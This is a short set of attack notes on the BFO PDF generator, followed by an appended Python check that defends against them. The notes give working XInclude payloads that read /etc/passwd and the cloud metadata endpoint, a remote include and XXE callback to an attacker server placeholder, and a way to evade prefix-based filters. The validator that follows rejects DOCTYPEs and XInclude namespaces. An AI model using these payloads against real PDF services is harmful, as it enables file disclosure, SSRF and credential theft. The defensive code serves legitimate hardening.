Attacking BFO's PDF Gen.

INFO DISCLOSURE: Version

WIP

EXPLOIT VECTOR 1: <pdfset> with XInclude

Local File Inclusion / HTTP Response View (SSRF)

Assuming you have the ability to add a pdfset or pdf element, you can potentially load the XInclude (XML Inclusions) namespace with:

<pdfset xmlns:xi="http://www.w3.org/2003/XInclude">
OR
<pdf xmlns:xi="http://www.w3.org/2003/XInclude">

This should allow you to use the namespace in the document to retrieve local files and the responses to HTTP requests.

Note: parse="text" is probably required for the files you want to retrieve, since they might not be XML.

<!-- Local file read -->
<xi:include parse="text" href="file:///etc/passwd" />
<!-- Remote HTTP response read -->
<xi:include parse="text" href="http://169.254.169.254/latest/meta-data/" />

Bypassing Filtering systems

Assuming you can use the XInclude namespace, you might be able to bypass filtering implementations by referencing a remote XML document:

<xi:include href="https://{YOUR_SERVER}/test.xml" />

When the PDF is generated, the XInclude will be used to pull content from the remote location ({YOUR_SERVER}) and load it into the document. If filtering is in place for the xmlns:xi prefix, you can always rename it to xmlns:xd or similar and still use it, since the prefix is arbitrary and only the namespace URI identifies XInclude.

EXPLOIT VECTOR 2: External Entity Processing El-Classico

Assuming you can add headers (such as a DOCTYPE) before <pdf> or <pdfset>, BFO seems to behave much like most XML parsers, so if you want to do classic entity replacement, you can!

<!DOCTYPE replace [<!ENTITY ent SYSTEM "https://{YOUR_SERVER}/callback?"> ]>
<pdf>
	<body>
		&ent;
	</body>
</pdf>
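
A pre-parse gate covering both vectors above, as an added example that is not part of the original notes or of BFO's code: it rejects untrusted template XML that carries a DOCTYPE or binds the XInclude namespace under any prefix, before the document reaches the PDF generator. The function name and the sample templates are constructed for illustration, and the check also covers the W3C XInclude 1.0 namespace URI in addition to the one used on this page.

```python
import xml.parsers.expat

# XInclude namespace URIs to refuse: the one used on this page, plus the
# URI from the W3C XInclude 1.0 Recommendation.
XINCLUDE_NAMESPACES = frozenset({
    "http://www.w3.org/2003/XInclude",
    "http://www.w3.org/2001/XInclude",
})


class _Rejected(Exception):
    """Internal signal used to stop parsing at the first violation."""


def template_violation(xml_bytes):
    """Return a reason string if the template must be rejected, else None."""
    parser = xml.parsers.expat.ParserCreate(namespace_separator=" ")

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # No DOCTYPE means no entity declarations, internal or external.
        raise _Rejected("DOCTYPE declaration present")

    def on_namespace(prefix, uri):
        # Compare the bound URI; the prefix (xi, xd, default) is arbitrary.
        if uri in XINCLUDE_NAMESPACES:
            raise _Rejected("XInclude namespace bound to prefix %r" % (prefix,))

    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartNamespaceDeclHandler = on_namespace
    try:
        parser.Parse(xml_bytes, True)
    except _Rejected as exc:
        return str(exc)
    except xml.parsers.expat.ExpatError as exc:
        return "not well-formed: %s" % exc
    return None


# Constructed sample templates (not taken from a real application).
SAMPLES = {
    "plain": b"<pdf><body><p>Invoice 42</p></body></pdf>",
    "renamed_prefix": b'<pdf xmlns:xd="http://www.w3.org/2003/XInclude">'
                      b'<body><xd:include href="https://example.invalid/t.xml"/></body></pdf>',
    "doctype": b'<!DOCTYPE replace [<!ENTITY ent SYSTEM "https://example.invalid/c">]>'
               b"<pdf><body>&ent;</body></pdf>",
}

if __name__ == "__main__":
    for name, doc in SAMPLES.items():
        print(name, "->", template_violation(doc))
```

Because the check runs on parsed namespace bindings rather than on the raw text, a filter that only looks for the literal string xmlns:xi is not needed and the renamed-prefix case is caught by the same rule.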